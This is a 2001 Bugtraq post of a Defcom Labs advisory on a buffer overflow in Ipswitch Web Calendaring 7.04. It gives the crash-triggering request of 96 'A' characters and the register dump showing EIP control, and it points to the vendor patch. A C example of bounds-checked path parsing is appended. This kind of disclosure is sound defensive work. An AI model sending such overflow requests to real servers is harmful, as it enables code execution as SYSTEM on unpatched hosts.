From andreas.junestam@defcom.com Sun Oct 14 00:10:18 2001
From: andreas junestam
To: bugtraq
Date: Fri, 12 Oct 2001 13:04:16 +0200
Subject: def-2001-29

======================================================================
                  Defcom Labs Advisory def-2001-29

           Ipswitch Web Calendaring 7.04 Buffer Overflow

Author: Andreas Junestam
Release Date: 2001-10-12
======================================================================
------------------------=[Brief Description]=-------------------------
When sending a request to the Web Calendar (port 8484) longer than
97 bytes, an overflow will occur and EIP will be overwritten.

------------------------=[Affected Systems]=--------------------------
- Ipswitch Web Calendaring 7.04 and possibly earlier versions

----------------------=[Detailed Description]=------------------------
Sending a request like:

GET /'A' x 96 HTTP/1.0

Generates:

Access violation - code c0000005 (first chance)
eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e edi=00000000
eip=61616161 esp=016f99fc ebp=61616161
61616161 ??               ???

This leaves us with the possibility to run code as SYSTEM. Mind though,
the server does a ToLower on the buffer BEFORE the overflow occurs,
limiting the number of instructions we can use.

---------------------------=[Workaround]=-----------------------------
Download the new version from:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 1st of
October, 2001. A patch has been released.

======================================================================
            This release was brought to you by Defcom Labs

              http://labs.defcom.com    http://www.defcom.com
======================================================================
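
Added example, not part of the Defcom advisory and not Ipswitch's code: a request-path handler in C that does the same lower-casing the advisory mentions, but checks the path length against the destination buffer before any byte is copied. PATH_BUF, the function names and the return codes are assumptions; the real buffer size is not given in the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PATH_BUF 97   /* hypothetical buffer size; the real one is not in the advisory */
enum { REQ_OK = 0, REQ_MALFORMED = -1, REQ_TOO_LONG = -2 };

/* Extract the path from "GET <path> HTTP/1.x" and lower-case it into out[outsz].
 * The length is checked against the destination BEFORE anything is written. */
int parse_request_path(const char *line, char *out, size_t outsz)
{
    if (line == NULL || out == NULL || outsz == 0)
        return REQ_MALFORMED;
    out[0] = '\0';
    if (strncmp(line, "GET ", 4) != 0)
        return REQ_MALFORMED;
    const char *path = line + 4;
    const char *end = strchr(path, ' ');
    if (end == NULL || path[0] != '/')
        return REQ_MALFORMED;
    size_t len = (size_t)(end - path);
    if (len >= outsz)                 /* need room for len bytes plus the NUL */
        return REQ_TOO_LONG;
    for (size_t i = 0; i < len; i++)
        out[i] = (char)tolower((unsigned char)path[i]);
    out[len] = '\0';
    return REQ_OK;
}

/* Constructed sample input in the advisory's shape: "GET /" + n x 'A' + " HTTP/1.0". */
int check_advisory_request(size_t n)
{
    char line[512], path[PATH_BUF];
    if (n > 400)
        return REQ_MALFORMED;
    memcpy(line, "GET /", 5);
    memset(line + 5, 'A', n);
    strcpy(line + 5 + n, " HTTP/1.0");
    return parse_request_path(line, path, sizeof path);
}

int main(void)
{
    printf("n=95 -> %d\n", check_advisory_request(95));
    printf("n=96 -> %d\n", check_advisory_request(96));
    return 0;
}
```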